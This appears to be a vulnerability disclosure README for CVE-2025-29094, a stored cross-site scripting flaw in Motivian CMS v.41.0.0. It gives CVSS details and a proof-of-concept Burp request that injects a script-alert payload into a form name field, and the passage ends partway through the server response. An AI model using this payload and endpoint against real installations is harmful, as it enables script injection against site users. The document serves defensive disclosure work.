# CVE-2025-29094-Multiple-Stored-Cross-Site-Scripting-XSS This repository reveals a security vulnerability discovered in Motivian Content Management System v.41.0.0. - CVE-2025-29094: Multiple Stored Cross-Site Scripting (XSS) This vulnerability was reported to the vendor in accordance with responsible disclosure practices, and to MITRE, which assigned a temporary CVE ID. The details are being made public following the expiration of the 45-day disclosure period. ## General Information - **Title:** Motivian Stored Cross Site Scripting (XSS) - **Vulnerability Type:** Stored XSS - **Vendor of Product:** Motivian - **Product:** Motivian Content Management System - **Affected Version:** Motivian CMS v.41.0.0 - **Affected Components:** `Marketing/Forms`, `Marketing/Offers`, `Content/Pages` - **Attack Vector:** Remote - **Impact:** Arbitrary JavaScript execution in victim's browser - **Severity:** High - **CVSSv3 score:** 7.6 - **CVSSv3 vector:** CVSS:3.1:AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N - **Found:** 2025-01-29 - **By:** Francesco Marcuccio - **Status:** Reported to vendor on April 7, 2025 - No response/fix received by May 22, 2025 ### Description Cross Site Scripting vulnerability in Motivian Content Mangment System v.41.0.0 allows a remote attacker to execute arbitrary code via the `Marketing/Forms`, `Marketing/Offers` and `Content/Pages` components. The vulnerability was exploited by injecting malicious JavaScript code into various fields, including the title in `Marketing/Form` and `Marketing/Offers`, and the *header script* field in `Content/Pages` ### Proof Of Concept The vulnerability can be exploited through various fields across different components. For demonstration purposes, the following proof-of-concept focuses on a specific scenario: 1. Navigate to the `Marketing/Forms` section and create a new form element. 2. Insert a malicious script into the *Name* field and save the form. Below is the full transcript of the HTTP requests and responses used to demonstrate the issue: #### _Burp Request_ ```http title:BurpRequest POST /portal/admin/formbuilder/editCmsFormProps!saveForm.action HTTP/1.1 Host: [REDACTED] Content-Length: 1362 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: [REDACTED] Connection: close targetFieldId=&targetFormId=&targetFieldIndex=&openedTabProps=tab1&langSelected=it&form.id=1162&search_form_id=&search_form_status_id=&search_form_name=&search_form_description=&date_from=&date_to=¤tPage=&struts.token.name=EditCmsFormProps&EditCmsFormProps=DBFW4RH1O9SVF1J3J9TA0WSD5VHPJCKY&date_notification=&form.seoName_en=&form.seoName_el=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&[...] ``` #### _Burp Response_ ```http title:BurpResponse HTTP/1.1 200 OK Connection: close Date: Wed, 05 Feb 2025 12:00:09 GMT Content-Type: text/html;charset=ISO-8859-1 Content-Language: it-IT Content-Length: 94593